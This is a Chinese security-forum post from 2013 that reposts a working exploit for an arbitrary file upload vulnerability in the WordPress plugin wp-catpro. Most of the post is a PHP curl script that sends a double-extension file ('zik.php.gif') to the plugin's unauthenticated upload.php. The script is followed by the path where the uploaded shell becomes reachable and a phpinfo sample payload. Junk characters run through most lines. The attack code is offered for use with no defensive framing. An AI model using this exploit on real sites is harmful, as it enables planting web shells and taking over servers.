找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2242|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability/ }9 G2 |$ g! u  R
#-----------------------------------------------------------------------6 V8 N* n% I( h: m! }& @; ^
7 ~4 ?6 P  k. T! L% y
作者  => Zikou-16- T  x) ~) q7 b$ O7 [$ f
邮箱 => zikou16x@gmail.com7 x: C1 r; T8 I6 \
测试系统 : Windows 7 , Backtrack 5r3, f$ l! _2 E! E
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
% ^% o" K% J) `6 K. f$ N' l####/ a- b, m0 w0 Y3 ]2 U* a

. B6 F2 c9 F5 F$ ]( e#=> Exploit 信息:
* b4 Z* B2 ?9 A% x' @2 j5 w------------------, h+ `+ L2 C5 X. h7 y$ ~- y0 S
# 攻击者可以上传 file/shell.php.gif
2 x9 c' x7 [, m1 N3 D. Z, A9 i" J4 J: H# ("jpg", "gif", "png")  // Allowed file extensions/ }7 |7 S2 h8 W7 M' R. q
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
8 E; ]; k' R5 F# D5 L( M: i" ?7 i$ H# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)  }+ d& r5 ?6 o9 A* B5 X
------------------
8 A2 V+ ]( F5 z- T, } 1 J& H: O0 l- ?2 O3 p# m
#=> Exploit+ @! W# J; b5 ~3 f2 z
-----------' E2 ^" D! M- z0 z9 N8 E& p; i
<?php. U( z8 @5 Y9 ]1 ]: ?; ?% w

& n+ ~! d( ~5 R1 y  ~$uploadfile="zik.php.gif";8 R/ Z- u/ H' e& Y6 n( u
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
% Z# e& P& K3 g0 C2 ~curl_setopt($ch, CURLOPT_POST, true);
; _) v% [# |3 x( t8 Z9 X8 u/ b6 L" ]curl_setopt($ch, CURLOPT_POSTFIELDS,$ n5 m) P4 M% {
array('Filedata'=>"@$uploadfile",5 V7 z) N* z: S. m. R
'folder'=>'/wp-content/uploads/catpro/'));
0 U- i$ C' s6 }. zcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 N7 a3 ?2 L$ O$ K) [7 f$postResult = curl_exec($ch);
) Z- k& U" M( M# P3 A5 x/ y% Icurl_close($ch);
' M( x5 c, P% i4 h) m, w 3 p- V7 f; X2 M. b
print "$postResult";
6 w, j9 ^4 Q1 z6 A' W7 v ! R' j  L9 K9 }7 R7 ^7 S/ P
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
8 h1 d: J7 l, J  ?>% \# n2 m2 l2 Y. @
<?php1 X5 X1 U# z4 i6 x: I4 t; U8 ]
phpinfo();' B3 j% u* l7 F, g- \  r; a) A
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表